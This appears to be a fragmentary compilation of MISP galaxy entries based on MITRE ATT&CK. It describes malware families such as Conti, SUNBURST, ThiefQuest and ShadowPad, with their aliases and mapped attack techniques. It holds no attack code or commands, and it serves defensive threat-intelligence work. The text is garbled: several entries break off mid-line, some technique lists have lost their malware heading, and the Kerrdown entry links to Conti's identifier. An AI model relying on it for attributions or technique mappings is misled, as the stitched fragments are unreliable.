- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0487">https://attack.mitre.org/software/S0487</a></td>
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</table>

Dacls - S0497

[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by
Lazarus Group (https://attack.mitre.org/groups/G0032) since at least December 2019.

The tag is: misp-galaxy:mitre-malware="Dacls - S0497"

Dacls - S0497 is also known as:

- Dacls

Dacls - S0497 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0497">https://attack.mitre.org/software/S0497</a></td>
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</table>

WolfRAT - S0489

WolfRAT (https://attack.mitre.org/software/S0489) is malware based on a leaked version of Dendroid (https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. WolfRAT (https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.

Citation: Talos-WolfRAT
The tag is: misp-galaxy:mitre-malware="WolfRAT - S0489"

WolfRAT - S0489 is also known as:

- WolfRAT

WolfRAT - S0489 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
Cryptoistoic - S0498

[Cryptoistoic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: SentinelOne Lazarus macOS July 2020)

The tag is: **misp-galaxy:mitre-malware="Cryptoistoic - S0498"**

Cryptoistoic - S0498 is also known as:

- Cryptoistoic

Cryptoistoic - S0498 has relationships with:

- uses: **misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"** with estimative-language:likelihood-probability="almost-certain"

Hancitor - S0499

[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by
[Pony](https://attack.mitre.org/software/S0453) and other information stealing malware. (Citation: Threatpost Hancitor) (Citation: FireEye Hancitor)

The tag is: `misp-galaxy:mitre-malware="Hancitor - S0499"`

Hancitor - S0499 is also known as:

- Hancitor
- Chanitor

Hancitor - S0499 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

*Table 4880. Table References*

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<td><a href="https://attack.mitre.org/software/S0499">https://attack.mitre.org/software/S0499</a></td>
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</table>
CHEMISTGAMES - S0555

[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)

The tag is: `misp-galaxy:mitre-malware="CHEMISTGAMES - S0555"`

CHEMISTGAMES - S0555 is also known as:

- CHEMISTGAMES

CHEMISTGAMES - S0555 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"

Table 4881. Table References

Links
Raindrop - S0565

[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020. (Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solarigate January 2021)

The tag is: `misp-galaxy:mitre-malware="Raindrop - S0565"

Raindrop - S0565 is also known as:

- Raindrop

Raindrop - S0565 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Masquerading - T1036"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0565">https://attack.mitre.org/software/S0565</a></td>
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</table>
Conti - S0575

[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has been distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)

The tag is: `misp-galaxy:mitre-malware="Conti - S0575"`

Conti - S0575 is also known as:

- Conti

Conti - S0575 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-
Kerrdown - S0585

[Kerrdown](https://attack.mitre.org/software/S0575) is a downloader used by [APT32](https://attack.mitre.org/groups/G0050) to install spyware from a server on the victim's network. (Citation: Amnesty Intl. Ocean Lotus February 2021)

The tag is: `misp-galaxy:mitre-malware="Kerrdown - S0585"`

Kerrdown - S0585 is also known as:

- Kerrdown

Kerrdown - S0585 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with estimative-language:likelihood-probability="almost-certain"
SUNBURST - S0559

[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020. (Citation: SolarWinds Sunburst Sunspot Update January 2021) (Citation: Microsoft Deep Dive Solarigate January 2021)

The tag is: `misp-galaxy:mitre-malware=SUNBURST - S0559`

SUNBURST - S0559 is also known as:

- SUNBURST
- Solarigate

SUNBURST - S0559 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern=Query Registry - T1012` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=File and Directory Discovery - T1083` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=Obfuscated Files or Information - T1027` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=DNS - T1071.004` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=File Deletion - T1070.004` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=Data from Local System - T1005` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=Security Software Discovery - T1518.001` with
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 4885. Table References

Links
ThiefQuest - S0595

[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links. (Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware. (Citation: wardle evilquest partii) (Citation: reed thiefquest ransomware analysis)

The tag is: misp-galaxy:mitre-malware="ThiefQuest - S0595"

ThiefQuest - S0595 is also known as:

- ThiefQuest
- MacRansom.K
- EvilQuest

ThiefQuest - S0595 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://objective-see.com/blog/blog_0x60.html">https://objective-see.com/blog/blog_0x60.html</a></td>
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**MegaCortex - S0576**

[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)

The tag is: *misp-galaxy:mitre-malware="MegaCortex - S0576"

MegaCortex - S0576 is also known as:

- MegaCortex

MegaCortex - S0576 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html">https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html">https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html</a></td>
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</table>
Dtrack - S0567

[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)

The tag is: `misp-galaxy:mitre-malware="Dtrack - S0567"

Dtrack - S0567 is also known as:

- Dtrack

Dtrack - S0567 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0567">https://attack.mitre.org/software/S0567</a></td>
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<td><a href="https://www.dragos.com/threat/wassonite/">https://www.dragos.com/threat/wassonite/</a></td>
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**TAINTEDSCRIBE - S0586**

[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)

The tag is: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586"

TAINTEDSCRIBE - S0586 is also known as:
• TAINTEDSCRIBE

TAINTEDSCRIBE - S0586 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b</a></td>
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EVILNUM - S0568

[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)

The tag is: `misp-galaxy:mitre-malware="EVILNUM - S0568"`

EVILNUM - S0568 is also known as:

- EVILNUM

EVILNUM - S0568 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"` with estimative-language:likelihood-probability="almost-certain"
Explosive - S0569

[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: `misp-galaxy:mitre-malware="Explosive - S0569"`

Explosive - S0569 is also known as:

- Explosive

Explosive - S0569 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
**ShadowPad - S0596**

[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)

The tag is: `misp-galaxy:mitre-malware="ShadowPad - S0596"

ShadowPad - S0596 is also known as:

- ShadowPad
- POISONPLUG.SHADOW

ShadowPad - S0596 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://content.fireeye.com//apt-41/rpt-apt41">https://content.fireeye.com//apt-41/rpt-apt41</a></td>
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**FrozenCell - S0577**

[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)

The tag is: **misp-galaxy:mitre-malware="FrozenCell - S0577"**

FrozenCell - S0577 is also known as:
FrozenCell

FrozenCell - S0577 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4893. Table References

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<td><a href="https://blog.lookout.com/frozencell-mobile-threat">https://blog.lookout.com/frozencell-mobile-threat</a></td>
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SUPERNOVA - S0578

[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)

The tag is: `misp-galaxy:mitre-malware="SUPERNOVA - S0578"`
SUPERNova - S0578 is also known as:

- SUPERNova

SUPERNova - S0578 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

